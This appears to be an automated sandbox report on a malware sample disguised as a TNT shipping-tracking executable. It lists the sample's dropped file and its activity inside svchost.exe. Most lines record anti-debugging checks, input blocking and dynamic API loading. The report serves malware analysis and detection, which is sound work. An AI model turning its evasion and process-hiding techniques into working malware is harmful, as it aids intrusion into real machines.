Source: w2-0G0-7.15.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_0397096E rdtsc

5_2_0397096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_00417713 LdrLoadDll,

5_2_00417713

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00B13F09 BlockInput,

0_2_00B13F09

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00AA3B3A

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AD5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00AD5A7C

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AA4B37 LoadLibraryA,GetProcAddress,

0_2_00AA4B37

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_03963580 mov eax, dword ptr fs:[00000030h]	0_2_03963580
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_03963520 mov eax, dword ptr fs:[00000030h]	0_2_03963520
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_03961EA0 mov eax, dword ptr fs:[00000030h]	0_2_03961EA0
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00D83580 mov eax, dword ptr fs:[00000030h]	4_2_00D83580
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00D83520 mov eax, dword ptr fs:[00000030h]	4_2_00D83520
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00D81EA0 mov eax, dword ptr fs:[00000030h]	4_2_00D81EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03928397 mov eax, dword ptr fs:[00000030h]	5_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03928397 mov eax, dword ptr fs:[00000030h]	5_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03928397 mov eax, dword ptr fs:[00000030h]	5_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392E388 mov eax, dword ptr fs:[00000030h]	5_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392E388 mov eax, dword ptr fs:[00000030h]	5_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392E388 mov eax, dword ptr fs:[00000030h]	5_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395438F mov eax, dword ptr fs:[00000030h]	5_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395438F mov eax, dword ptr fs:[00000030h]	5_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE3DB mov eax, dword ptr fs:[00000030h]	5_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE3DB mov eax, dword ptr fs:[00000030h]	5_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE3DB mov ecx, dword ptr fs:[00000030h]	5_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE3DB mov eax, dword ptr fs:[00000030h]	5_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D43D4 mov eax, dword ptr fs:[00000030h]	5_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D43D4 mov eax, dword ptr fs:[00000030h]	5_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039EC3CD mov eax, dword ptr fs:[00000030h]	5_2_039EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039383C0 mov eax, dword ptr fs:[00000030h]	5_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039383C0 mov eax, dword ptr fs:[00000030h]	5_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039383C0 mov eax, dword ptr fs:[00000030h]	5_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039383C0 mov eax, dword ptr fs:[00000030h]	5_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B63C0 mov eax, dword ptr fs:[00000030h]	5_2_039B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	5_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	5_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	5_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039663FF mov eax, dword ptr fs:[00000030h]	5_2_039663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039403E9 mov eax, dword ptr fs:[00000030h]	5_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039403E9 mov eax, dword ptr fs:[00000030h]	5_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039403E9 mov eax, dword ptr fs:[00000030h]	5_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039403E9 mov eax, dword ptr fs:[00000030h]	5_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039403E9 mov eax, dword ptr fs:[00000030h]	5_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039403E9 mov eax, dword ptr fs:[00000030h]	5_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039403E9 mov eax, dword ptr fs:[00000030h]	5_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039403E9 mov eax, dword ptr fs:[00000030h]	5_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392C310 mov ecx, dword ptr fs:[00000030h]	5_2_0392C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A08324 mov eax, dword ptr fs:[00000030h]	5_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A08324 mov ecx, dword ptr fs:[00000030h]	5_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A08324 mov eax, dword ptr fs:[00000030h]	5_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A08324 mov eax, dword ptr fs:[00000030h]	5_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03950310 mov ecx, dword ptr fs:[00000030h]	5_2_03950310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396A30B mov eax, dword ptr fs:[00000030h]	5_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396A30B mov eax, dword ptr fs:[00000030h]	5_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396A30B mov eax, dword ptr fs:[00000030h]	5_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B035C mov eax, dword ptr fs:[00000030h]	5_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B035C mov eax, dword ptr fs:[00000030h]	5_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B035C mov eax, dword ptr fs:[00000030h]	5_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B035C mov ecx, dword ptr fs:[00000030h]	5_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B035C mov eax, dword ptr fs:[00000030h]	5_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B035C mov eax, dword ptr fs:[00000030h]	5_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FA352 mov eax, dword ptr fs:[00000030h]	5_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D8350 mov ecx, dword ptr fs:[00000030h]	5_2_039D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B2349 mov eax, dword ptr fs:[00000030h]	5_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D437C mov eax, dword ptr fs:[00000030h]	5_2_039D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A0634F mov eax, dword ptr fs:[00000030h]	5_2_03A0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E284 mov eax, dword ptr fs:[00000030h]	5_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E284 mov eax, dword ptr fs:[00000030h]	5_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B0283 mov eax, dword ptr fs:[00000030h]	5_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B0283 mov eax, dword ptr fs:[00000030h]	5_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B0283 mov eax, dword ptr fs:[00000030h]	5_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C62A0 mov eax, dword ptr fs:[00000030h]	5_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C62A0 mov ecx, dword ptr fs:[00000030h]	5_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C62A0 mov eax, dword ptr fs:[00000030h]	5_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C62A0 mov eax, dword ptr fs:[00000030h]	5_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C62A0 mov eax, dword ptr fs:[00000030h]	5_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C62A0 mov eax, dword ptr fs:[00000030h]	5_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039402E1 mov eax, dword ptr fs:[00000030h]	5_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039402E1 mov eax, dword ptr fs:[00000030h]	5_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039402E1 mov eax, dword ptr fs:[00000030h]	5_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A062D6 mov eax, dword ptr fs:[00000030h]	5_2_03A062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392823B mov eax, dword ptr fs:[00000030h]	5_2_0392823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392A250 mov eax, dword ptr fs:[00000030h]	5_2_0392A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03936259 mov eax, dword ptr fs:[00000030h]	5_2_03936259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039EA250 mov eax, dword ptr fs:[00000030h]	5_2_039EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039EA250 mov eax, dword ptr fs:[00000030h]	5_2_039EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B8243 mov eax, dword ptr fs:[00000030h]	5_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B8243 mov ecx, dword ptr fs:[00000030h]	5_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0274 mov eax, dword ptr fs:[00000030h]	5_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0274 mov eax, dword ptr fs:[00000030h]	5_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0274 mov eax, dword ptr fs:[00000030h]	5_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0274 mov eax, dword ptr fs:[00000030h]	5_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0274 mov eax, dword ptr fs:[00000030h]	5_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0274 mov eax, dword ptr fs:[00000030h]	5_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0274 mov eax, dword ptr fs:[00000030h]	5_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0274 mov eax, dword ptr fs:[00000030h]	5_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0274 mov eax, dword ptr fs:[00000030h]	5_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0274 mov eax, dword ptr fs:[00000030h]	5_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0274 mov eax, dword ptr fs:[00000030h]	5_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0274 mov eax, dword ptr fs:[00000030h]	5_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03934260 mov eax, dword ptr fs:[00000030h]	5_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03934260 mov eax, dword ptr fs:[00000030h]	5_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03934260 mov eax, dword ptr fs:[00000030h]	5_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392826B mov eax, dword ptr fs:[00000030h]	5_2_0392826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A0625D mov eax, dword ptr fs:[00000030h]	5_2_03A0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B019F mov eax, dword ptr fs:[00000030h]	5_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B019F mov eax, dword ptr fs:[00000030h]	5_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B019F mov eax, dword ptr fs:[00000030h]	5_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B019F mov eax, dword ptr fs:[00000030h]	5_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392A197 mov eax, dword ptr fs:[00000030h]	5_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392A197 mov eax, dword ptr fs:[00000030h]	5_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392A197 mov eax, dword ptr fs:[00000030h]	5_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03970185 mov eax, dword ptr fs:[00000030h]	5_2_03970185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039EC188 mov eax, dword ptr fs:[00000030h]	5_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039EC188 mov eax, dword ptr fs:[00000030h]	5_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D4180 mov eax, dword ptr fs:[00000030h]	5_2_039D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D4180 mov eax, dword ptr fs:[00000030h]	5_2_039D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A061E5 mov eax, dword ptr fs:[00000030h]	5_2_03A061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	5_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	5_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]	5_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	5_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	5_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F61C3 mov eax, dword ptr fs:[00000030h]	5_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F61C3 mov eax, dword ptr fs:[00000030h]	5_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039601F8 mov eax, dword ptr fs:[00000030h]	5_2_039601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DA118 mov ecx, dword ptr fs:[00000030h]	5_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DA118 mov eax, dword ptr fs:[00000030h]	5_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DA118 mov eax, dword ptr fs:[00000030h]	5_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DA118 mov eax, dword ptr fs:[00000030h]	5_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F0115 mov eax, dword ptr fs:[00000030h]	5_2_039F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE10E mov eax, dword ptr fs:[00000030h]	5_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE10E mov ecx, dword ptr fs:[00000030h]	5_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE10E mov eax, dword ptr fs:[00000030h]	5_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE10E mov eax, dword ptr fs:[00000030h]	5_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE10E mov ecx, dword ptr fs:[00000030h]	5_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE10E mov eax, dword ptr fs:[00000030h]	5_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE10E mov eax, dword ptr fs:[00000030h]	5_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE10E mov ecx, dword ptr fs:[00000030h]	5_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE10E mov eax, dword ptr fs:[00000030h]	5_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DE10E mov ecx, dword ptr fs:[00000030h]	5_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03960124 mov eax, dword ptr fs:[00000030h]	5_2_03960124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392C156 mov eax, dword ptr fs:[00000030h]	5_2_0392C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C8158 mov eax, dword ptr fs:[00000030h]	5_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A04164 mov eax, dword ptr fs:[00000030h]	5_2_03A04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A04164 mov eax, dword ptr fs:[00000030h]	5_2_03A04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03936154 mov eax, dword ptr fs:[00000030h]	5_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03936154 mov eax, dword ptr fs:[00000030h]	5_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C4144 mov eax, dword ptr fs:[00000030h]	5_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C4144 mov eax, dword ptr fs:[00000030h]	5_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C4144 mov ecx, dword ptr fs:[00000030h]	5_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C4144 mov eax, dword ptr fs:[00000030h]	5_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C4144 mov eax, dword ptr fs:[00000030h]	5_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393208A mov eax, dword ptr fs:[00000030h]	5_2_0393208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F60B8 mov eax, dword ptr fs:[00000030h]	5_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F60B8 mov ecx, dword ptr fs:[00000030h]	5_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039280A0 mov eax, dword ptr fs:[00000030h]	5_2_039280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C80A8 mov eax, dword ptr fs:[00000030h]	5_2_039C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B20DE mov eax, dword ptr fs:[00000030h]	5_2_039B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392C0F0 mov eax, dword ptr fs:[00000030h]	5_2_0392C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039720F0 mov ecx, dword ptr fs:[00000030h]	5_2_039720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]	5_2_0392A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039380E9 mov eax, dword ptr fs:[00000030h]	5_2_039380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B60E0 mov eax, dword ptr fs:[00000030h]	5_2_039B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394E016 mov eax, dword ptr fs:[00000030h]	5_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394E016 mov eax, dword ptr fs:[00000030h]	5_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394E016 mov eax, dword ptr fs:[00000030h]	5_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394E016 mov eax, dword ptr fs:[00000030h]	5_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B4000 mov ecx, dword ptr fs:[00000030h]	5_2_039B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D2000 mov eax, dword ptr fs:[00000030h]	5_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D2000 mov eax, dword ptr fs:[00000030h]	5_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D2000 mov eax, dword ptr fs:[00000030h]	5_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D2000 mov eax, dword ptr fs:[00000030h]	5_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D2000 mov eax, dword ptr fs:[00000030h]	5_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D2000 mov eax, dword ptr fs:[00000030h]	5_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D2000 mov eax, dword ptr fs:[00000030h]	5_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D2000 mov eax, dword ptr fs:[00000030h]	5_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C6030 mov eax, dword ptr fs:[00000030h]	5_2_039C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392A020 mov eax, dword ptr fs:[00000030h]	5_2_0392A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392C020 mov eax, dword ptr fs:[00000030h]	5_2_0392C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03932050 mov eax, dword ptr fs:[00000030h]	5_2_03932050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B6050 mov eax, dword ptr fs:[00000030h]	5_2_039B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395C073 mov eax, dword ptr fs:[00000030h]	5_2_0395C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D678E mov eax, dword ptr fs:[00000030h]	5_2_039D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039307AF mov eax, dword ptr fs:[00000030h]	5_2_039307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E47A0 mov eax, dword ptr fs:[00000030h]	5_2_039E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393C7C0 mov eax, dword ptr fs:[00000030h]	5_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B07C3 mov eax, dword ptr fs:[00000030h]	5_2_039B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039347FB mov eax, dword ptr fs:[00000030h]	5_2_039347FB
